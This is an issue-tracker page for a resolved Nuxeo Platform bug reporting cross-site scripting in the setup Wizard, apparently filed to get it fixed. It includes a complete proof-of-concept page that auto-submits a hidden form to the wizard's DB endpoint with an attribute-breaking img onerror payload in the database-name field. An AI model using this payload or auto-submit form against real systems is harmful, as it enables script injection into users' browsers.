Uploaded image for project: 'Nuxeo Platform'
  1. Nuxeo Platform
  2. NXP-20277

Fix XSS in Wizard

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Minor
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: 7.10-HF18, 8.10
    • Component/s: Wizard

      Description

      To be tested with Firefox.
      To reproduce:

      • Open the attached XSS.html
      • The alert is displayed

      Content of XSS.html:

      <body onload='go();'>
<form method=post name=i action='http://localhost:8080/nuxeo/DB'>
<input type='hidden' name='refresh' value='false'>
<input type='hidden' name='nuxeo.dbtemplate' value='postgresql'>
<input type='hidden' name='nuxeo.db.name' value='n"><img src=x onerror=alert(/XSS/)>'>
<input type='hidden' name='nuxeo.db.user' value='nuxeo'>
<input type='hidden' name='nuxeo.db.password' value='password'>
<input type='hidden' name='nuxeo.db.host' value='localhost'>
<input type='hidden' name='nuxeo.db.port' value='5432'>
<input type='hidden' name='nuxeo.dbnosqltemplate' value='none'>
<input type='submit' value='PoC' name='r'>
</form>
<script>
function go() {
document.i.r.click();
}
</script>
</body>

        Attachments

          Activity

            People

            • Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: